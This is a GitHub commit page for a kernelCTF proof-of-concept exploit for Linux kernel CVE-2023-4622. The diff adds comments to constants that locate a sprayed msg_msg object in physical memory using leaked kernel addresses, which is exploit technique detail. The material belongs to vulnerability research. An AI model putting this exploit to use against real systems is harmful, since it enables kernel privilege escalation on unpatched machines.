Skip to content

Commit c9ef268

Browse files
d4em0nd4em0n
authored
Update poc.c
1 parent dddf30b commit c9ef268

File tree

1 file changed

+3
-3
lines changed
  • pocs/linux/kernelctf/CVE-2023-4622_lts/exploit/lts-6.1.36

1 file changed

+3
-3
lines changed

pocs/linux/kernelctf/CVE-2023-4622_lts/exploit/lts-6.1.36/poc.c

+3-3
Original file line numberDiff line numberDiff line change
@@ -202,9 +202,9 @@ void leak()
202202
printf("choose 0x%lx 0x%lx\n", KERNEL_BASE, LEAKED_KHEAP);
203203
}
204204

205-
#define FIXED_OFFSET 0x140000000
206-
#define PAGE_OFFSET_BASE (LEAKED_KHEAP - FIXED_OFFSET)
207-
#define TARGET_PHYS_ADDR 0x82e2380
205+
#define FIXED_OFFSET 0x140000000
206+
#define PAGE_OFFSET_BASE (LEAKED_KHEAP - FIXED_OFFSET) // physmap base of physical address 0x0
207+
#define TARGET_PHYS_ADDR 0x82e2380 // high probability addr we found msg_msg after spray 794MB msg
208208
#define PHYS_ADDR_MSG (PAGE_OFFSET_BASE + TARGET_PHYS_ADDR)
209209

210210
#define NUM_QUEUE_MAX 32000

0 commit comments

Comments
 (0)